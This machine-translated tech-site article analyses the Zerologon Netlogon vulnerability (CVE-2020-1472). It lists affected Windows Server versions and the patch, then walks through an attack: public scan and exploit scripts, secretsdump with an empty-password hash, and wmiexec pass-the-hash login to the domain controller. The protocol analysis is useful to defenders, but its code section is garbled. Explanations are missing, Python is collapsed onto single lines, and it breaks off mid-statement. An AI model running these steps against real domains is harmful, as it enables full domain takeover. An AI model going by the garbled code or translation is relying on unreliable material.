Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to carry out Netlogon privilege upgrade vulnerability CVE-2020-1472 analysis, many people may not know much about it. In order to make you understand better, the editor summarized the following content for you. I hope you can get something according to this article.

1. Vulnerability information 1. Brief description of loophole

Vulnerability name: Netlogon privilege escalation vulnerability

Vulnerability number: CVE-2020-1472

CVSS score: 10

Difficulty in using: simple

Basic users: no need

two。 Overview of components

The Netlogon remote protocol is a remote procedure call (RPC) interface for user and computer authentication on domain-based networks. The Netlogon remote protocol RPC interface is also used to replicate databases for backup domain controllers (BDC).

The Netlogon remote protocol is used to maintain domain relationships from domain members to domain controllers (DC), between domain DC, and between cross-domain DC. This RPC interface is used to discover and manage these relationships.

3. Vulnerability exploitation

The vulnerability is mainly due to the defect in the encryption part of the authentication protocol when using the Netlogon secure channel to connect with the domain control, so that the attacker can set the password of the domain control administrator user to empty, thus further achieving the password hash and finally obtaining the administrator rights. Successful utilization can realize logging in to the domain control device with administrator privileges, and further control the whole domain.

4. Vulnerability impact

Microsoft Windows Server 2008 R2 SP1

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

Microsoft Windows Server 2019

Microsoft Windows Server version 2004 (Server Core Installation)

Microsoft Windows Server version 1903 (Server Core Installation)

Microsoft Windows Server version 1909 (Server Core Installation)

5. Solution

Microsoft's official solution to the vulnerability is divided into two parts:

Part 1, first release the security update patch for this vulnerability, patch address: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

Part 2, complete the full protection of all devices (including non-Windows devices) added to the domain by Q1 in 2021.

Second, loophole recurrence 1. Environment building

Domain-controlled ip:xxxx

Target operation:

Install impacket:

Python setup.py install

two。 Vulnerability detection

Use a public test script to detect:

Pip install-r requirements.txt

Python Scan.py ADSrv01

Test results:

(1) there are loopholes

(2) Update patches have been installed

3. Vulnerability exploitation

Similarly, exploit verification is performed using a public exploit script (reset password is empty):

Python poc.py ADSrv01

Run result (different from the detection environment, but does not affect vulnerability exploitation):

Then, get the hash with an empty password:

Python secretsdump.py-hashes: 31d6cfe0d16ae931b73c59d7e0c089c0 'Domain/DC_NETBIOS_NAME$@dc_ip_addr' example: secretsdump.py-hashes: 31d6cfe0d16ae931b73c59d7e0c089c0' v4ler1an/ADSrv01 $@'

Here I use powershell, so I will pop up a cmd, output hash information, and then quickly turn it off. You can use linux to keep the window from closing immediately:

Here you can get the password hash of administrator, and then you can log in using hash:

Wmiexec.py-hashes HASH DOMAIN/USERNAME@IP

The examples here are:

Wmiexec.py-hashes aad3b435b51404eeaad3b435b51404ee:8756481b09eec95190a6663a2dd879ab v4ler1an _ adminstrator @

Follow-up actions:

Third, loophole analysis 1. Basic information

Vulnerability file: dll

Vulnerability function: NetrServerAuthenticate3, etc.

Vulnerability algorithm: AES-CFB8

two。 Background knowledge

Netlogon Remote Protocol is a RPC interface opened on the Windows domain control. It is used to perform a variety of task related to user and computer authentication, the most common of which is to facilitate users to log in to the server using the NTLM protocol. Other features include authentication for NTP response and, in particular, allowing the computer to update its password within the domain. The RPC interface can be used through TCP (a dynamic port assigned through the portmapper service of the domain controller) or through the SMB pipe on port 445.

The protocol does not use the same authentication strategy of RPC services, it uses a cryptographic protocol to allow client (intra-domain) and domain control to confirm the client account password hash. The main reason for using this way is that in the Windows NT era, computer accounts are no longer the preferred principle, so standard user authentication schemes such as NTLM or Kerberos cannot be used.

Netlogon session initialization is done by client, and client and sever exchange random 8-byte numbers (called challenges), and then both calculate session key by mixing the two challenges with client's account password hash using a key derivation function. Client then calculates a client credential using the calculated session key.

Server recalculates the same credential, and if the result is the same as that of client, it is determined that client has the correct user password and session key, and the verification is passed.

In the authentication handshake phase, both client and server can negotiate whether to encrypt subsequent messages and authenticate cryptography (called seal and sign), the main purpose of which is to defend against network-level attackers. If encryption is not used, some Netlogon call that perform important action will still contain an authticator value, which is also calculated using session key.

3. Detailed analysis

The encryption primitives used by client and server to generate credential are implemented by the ComputeNetlogonCredential () function, which takes an 8-byte input and then converts it using session key to output 8-byte data. The basic idea to ensure security here is that an attacker who does not know that session key will not be able to calculate or guess the correct output that matches an input will not be able to obtain a credential that can successfully achieve authentication.

1. Two algorithms for credential

There are two algorithms that can be used to calculate credential: AES-CFB8 and 2DES.

2DES

When calculating with 2DES, the logic for calculating session key is as follows:

# request ['SecureChannelType'] = secureChannelType-> nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,NETLOGON_SECURE_CHANNEL_TYPE enumeration value indicating the type of secure channel established by this call. # request ['ClientCredential'] = clientCredential-> ciphertext, a pointer to the NETLOGON_CREDENTIAL structure that contains client credentials. # request ['ComputerName'] = checkNullString (computerName)-> target_computer +'\ x00string, an empty terminated Unicode string containing the NetBIOS name of the client computer that called this method. # request ['NegotiateFlags'] = negotiateFlags-> flags # return dce.request (request) # Verification successful assert server_auth [' ErrorCode'] = = 0 return rpc_con except nrpc.DCERPCSessionError as ex: # if it fails, a STATUS_ACCESS_DENIED error is reported. This error is returned before the blasting is successful. If ex.get_error_code () = 0xc0000022: return None else: fail (f'Unexpected error code from DC: {ex.get_error_code ()}.') Except BaseException as ex: fail (f'Unexpected error: {ex}.') def perform_attack (dc_handle, dc_ip, target_computer): # blasting with an average of 256 print ('Performing authentication attempts...') Rpc_con = None for attempt in range (0, MAX_ATTEMPTS): rpc_con = try_zero_authenticate (dc_handle, dc_ip, target_computer) if rpc_con = None: print ('=', end='', flush=True) else: break if rpc_con: print ('\ nSuccess! DC can be fully compromised by a Zerologon attack.') Target is probably patched.') Sys.exit (1) if _ _ name__ = ='_ main__': if not (3

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.